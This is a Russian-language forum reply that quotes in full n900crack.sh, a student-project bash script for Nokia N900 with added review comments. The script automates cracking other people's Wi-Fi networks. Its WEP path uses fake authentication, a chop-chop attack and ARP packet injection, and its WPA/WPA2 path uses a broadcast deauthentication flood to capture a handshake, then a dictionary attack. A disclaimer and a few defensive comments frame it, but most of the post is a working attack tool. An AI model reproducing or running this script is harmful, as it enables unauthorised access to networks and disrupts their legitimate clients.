Re: N900-crack (восстановление забытого пароля AP с помощью N900)
Хм...
Я правильно понимаю, что этот скрипт и aircrack "не дружат" с последними версиями kernel-power?
Хм...
Я правильно понимаю, что этот скрипт и aircrack "не дружат" с последними версиями kernel-power?
Скрипт — не проще ли вставить его в шапку, зачем качать?
#! /bin/bash
# n900crack.sh
#Middlesex University
#Author: Krystian Majda M00221109
#email: niervol@gmail.com or km857@live.mdx.ac.uk
#Date: 18 April 2011
#This bash script is a deliverable of the final year project, CCM3422.
#Project superviser: Dr Jonathan Loo
#Second superviser: Dr Robert Colson
#
# Reading notes (review):
#   Flat script, no functions. Flow: load the wl1251 injection driver, run
#   airodump-ng for $scantime seconds, print the scan csv and let the user pick
#   a row, then branch on the encryption column of that row: OPN -> only a
#   message, WEP -> IV collection + aircrack-ng, anything else -> the
#   WPA/WPA2 handshake path (dictionary attack with wordlist.txt).
#   Every tool is run via sudo and most tool output is discarded
#   (>>/dev/null 2>&1), so tool failures are mostly invisible to the user.
#   Each 'sudo killall -q <tool>' terminates ALL processes of that name on
#   the device, not only the ones this script started.
clear
echo " n900crack.sh - by Krystian Majda km857@live.mdx.ac.uk"
echo " DISCLAIMER!!!"
echo This script is intended for educational, testing and password recovery purposes.
echo It is against the law to crack others networks.
echo I DO NOT TAKE ANY RESPONSIBILITY FOR INCORRECT OR ILLEGAL USE OF THIS SCRIPT
echo #
echo "WEP & WPA/2 cracking automation script for Nokia N900"
echo "required: aircrack-ng v1.0 and injection drivers: wl1251-meamo"
echo #
#directories and variables
# $crackdir is where all capture/csv/key files are written; $driverdir must
# contain the load.sh / unload.sh helpers used below.
crackdir="/home/user"
driverdir="/home/user/MyDocs/wl1251-maemo/binary/compat-wireless/"
# seconds the scan runs before airodump-ng is killed
scantime=20
nic="wlan0"
scanprefix="scan"
# the csv the script expects airodump-ng to produce for prefix "scan"
scanfile=$scanprefix"-01.csv"
# numbered rows of the scan are appended here and re-read after the user's choice
networklist=networks.txt
#load injection drivers
cd $driverdir
# loader output and errors are discarded and the exit status is not checked,
# so a failed driver load is not detected here
sudo sh load.sh >>/dev/null 2>&1
#change directory to crackdir
cd $crackdir
########## scan & print loop #################
# repeat until the user enters a network number other than 0; $choice is
# assigned by the 'read -p' at the bottom of the loop body
while [ "$choice" -eq "0" ]; do
#remove previous scannig data and networks list
# NOTE(review): '$scan' is not one of the variables set above ($scanprefix is);
# when $scan is empty the pattern becomes '*.csv' and removes every .csv file
# in $crackdir, including capture csv files from earlier runs
rm -f $scan*.csv
rm -f $networklist
#scan for available networks
# airodump-ng runs in the background for $scantime seconds and is then killed by name
sudo airodump-ng -w $scanprefix --output-format csv $nic >>/dev/null 2>&1 &
echo "Scaning in progres... Please wait..."
sleep $scantime
sudo killall -q airodump-ng
echo #
echo "The following networks are available. Please note:"
echo "- Power field indicates signal level, the closer to 0 the better"
echo "- associated clent is required to crack WPA/WPA2, 'wordlist.txt' file is used for
dictionary attack"
#print/list available networks
# the 'cat | while' pipeline runs the loop in a subshell, so $linenumber is
# only meaningful inside the loop (it is not used after 'done')
linenumber=1
cat $scanfile | while read line; do
# rows containing " 0." are treated as network rows and numbered
# (TODO confirm which csv column this fragment is meant to match);
# all other rows (headers etc.) are printed without a number
if echo "$line" | grep -q " 0."
then
#print networks with numbers and store in networklist
# the "0N )," prefix becomes field 1 of the cut; the same prefix is grepped
# for below when the user's choice is resolved
echo "0"$linenumber ")," $line | cut -d, -f1,2,5,7,10,15 | tee -a $networklist
linenumber=`expr $linenumber + 1`
else
#print others without numbers
echo $line | cut -d, -f1,4,6,9,14
fi
done
#read choice from user input
read -p "Enter number of the network to crack or '0' to rescan: " choice
clear
done
########### end of scan & print loop ############
#variables needed for attack
# each line re-reads $networklist and selects the row whose prefix is
# "<choice> ),"; field numbers refer to the cut applied in the print loop
apmac=`cat $networklist | grep "$choice )," | cut -d, -f2`
apchanel=`cat $networklist | grep "$choice )," | cut -d, -f3`
apencryption=`cat $networklist | grep "$choice )," | cut -d, -f4`
# 'cut -c 2-' drops the first character of the field (presumably the space
# after the comma); the sed replaces a space with a space, i.e. a no-op as written
apname="$(cat $networklist | grep "$choice )," | cut -d, -f6 | cut -c 2- | sed 's/ /\ /g')"
# own MAC address taken from ifconfig output by field position; this depends
# on the exact ifconfig output format of the device
sourcemac=`sudo ifconfig | grep wlan0 | cut -d" " -f10 | cut -d- -f1,2,3,4,5,6`
#decide on attack type
case "$apencryption" in
#unencrypted networks
*OPN*) echo "$apname" " is open/unencrypted!";;
############################################################################
# Cracking WEP
# Defensive note: this path needs nothing but captured traffic (about $minivs
# IVs); it illustrates why WEP provides no real protection and should be
# replaced by WPA2/WPA3.
*WEP*) echo Cracking WEP encryption of $apname network, please be patient
echo when successfully cracked, password will be displayed on the screen and saved to
echo "$apname"".txt"
#WEP relevant variables
# $ivs is re-read from the airodump csv; $minivs is the threshold before cracking starts
ivs=0
minivs=30000
#removing previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt"
rm -f arp-request.cap
rm -f replay_dec*.xor
rm -f replay*.cap
#collecting #ivs
# background capture on the AP's channel, filtered to its BSSID; writes "$apname-01.*"
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>/dev/null 2>&1 &
sleep 2
#fake authentication
sudo aireplay-ng -1 900 -e "$apname" -a $apmac -h $sourcemac $nic >>/dev/null 2>&1 &
sleep 2
#chop chop attack to get PRGA
# runs in the foreground (not backgrounded) and its output is shown to the user
sudo aireplay-ng -4 -b $apmac -h $sourcemac -F $nic
#creating arp-request from PRGA
sudo packetforge-ng -0 -a $apmac -h $sourcemac -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request.cap
#injection of the arp packet
sudo aireplay-ng -2 -r arp-request.cap -h $sourcemac -F $nic >>/dev/null 2>&1 &
#waiting for minimum #ivs number
# polls column 11 of the airodump csv every 30s until it reaches $minivs
while [ $ivs -lt $minivs ]; do
sleep 30
ivs=`cat "$apname""-01.csv" | grep "$apname" | cut -d, -f11`
echo $ivs "of #ivs collected! Waiting for at least: " $minivs
done
#attempting to crack every 120s with new #ivs every time and saving password to file
# aircrack-ng writes the key to "$apname.txt" (-l); the loop ends when that
# file exists, and each round kills every aircrack-ng process by name
while [ ! -f "$apname"".txt" ]; do
clear
sudo aircrack-ng -l "$apname"".txt" "$apname""-01.cap" &
sleep 120
sudo killall -q aircrack-ng
done
#kill no longer needed processes
sudo killall -q airodump-ng
sudo killall -q aireplay-ng
#outputing stored password if cracked
if [ -f "$apname"".txt" ]; then
echo "#########################################"
echo " ####### Congratulations! ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
fi
;; ##### end of WEP attack
#######################################################################
######## Cracking WPA/WPA2
# Default arm: every encryption value that is neither OPN nor WEP lands here.
*) echo Cracking WPA/WPA2 encryption of $apname network
echo when successfully cracked, password will be displayed on the screen and saved to
echo "$apname"".txt"
#WPA relevant variables
# $handshake receives airodump-ng's console output and is grepped for "WPA handshake"
dictionary=wordlist.txt
handshake=handshake.txt
nohandshake=1
#deleting previous files if existing
rm -f "$apname""-01.cap" "$apname""-01.csv" "$apname""-01.kismet.netxml"
rm -f "$apname""-01.kismet.csv" replay*.cap "$apname"".txt" $handshake
#catching handshake
sudo airodump-ng -c $apchanel -w "$apname" --bssid $apmac $nic >>$handshake 2>&1 &
sleep 5
#deauthenticating clients until handshake captured
# Defensive note: this is the broadcast deauth pattern (-c ffffffffffff,
# repeated every 15 s) that a wireless IDS reports as a deauth flood;
# networks with 802.11w (PMF) enabled discard such unprotected deauth frames.
while [ "$nohandshake" -eq "1" ];do
echo Waiting for legitimate client and for full, valid 4-way handshake capture. Please, wait...
#deathenticate client
sudo aireplay-ng -0 2 -a $apmac -c ffffffffffff $nic >>/dev/null 2>&1 &
sleep 15
# the assignment runs only when grep -q succeeds, so it stores status 0 and ends the loop
grep -q "WPA handshake" $handshake && nohandshake=$?
done
#kill no longer needed processes to free-up some resources
sudo killall -q airodump-ng aireplay-ng
#brute-force the captured handshake against dictionary and save password to file
#computing power hungry
# offline dictionary attack: succeeds only if the passphrase is in $dictionary
# (see the else branch below); a long random passphrase is not found this way
sudo aircrack-ng -l "$apname"".txt" -w $dictionary -b $apmac "$apname""-01.cap"
#output cracked password again from file if existing
if [ -f "$apname"".txt" ]; then
echo "#########################################"
echo " ####### Congratulations! ########"
echo The cracked password for $apname is: `cat "$apname"".txt"`
echo Regularly changed, strong WPA password is recommende!
else
echo Unfortunately, password was not found in the provided dictionary: $dictionary
fi
;; ####### end of WPA/WPA2 attack
esac
#unload the drivers
# unloader output and status are discarded, as for load.sh above
cd $driverdir
sudo sh unload.sh >>/dev/null 2>&1
sleep 2
exit
#end